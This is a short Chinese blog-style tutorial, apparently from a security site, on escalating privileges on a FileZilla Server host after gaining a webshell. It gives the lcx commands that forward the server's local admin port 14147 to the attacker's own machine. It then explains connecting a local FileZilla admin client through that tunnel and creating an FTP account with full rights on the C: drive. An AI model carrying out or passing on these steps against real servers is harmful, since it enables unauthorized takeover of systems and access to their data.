前段时间lengf牛写了篇文章关于FileZilla Server的提权测试,俺看了也觉得不错 这不今天刚好遇上一个FileZilla Server的服务器,咋试试提权。当然lengf牛的是在FileZilla Server的目录有可写权限修改配置文件的情况下。如果目录不可写是否没办法了呢,大家有没有想到G6FTP如何提权的, G6FTP是把本机管理端口转发到自己的机器然后远程连接ftp服务器的。
这个是我复制回来的 服务器的管理信息
下面看我今天的演示:
本机执行lcx监听
lcx2 -listen 51 2001
Webshell下上传lcx 转发
Lcx –slave 你的ip 端口 要转发的ip 要转发端口
然后回到本地查看
然后本地下载FileZilla Server 运行 然后连接本机的2001 因为我是把远程服务器的14147端口转发到本机的2001了 所以大家千万别误解
然后用户 添加av 目录c盘 权限选择所有
下面登录ftp看看
http://www.91ri.org/6114.html
http://www.91ri.org/1849.html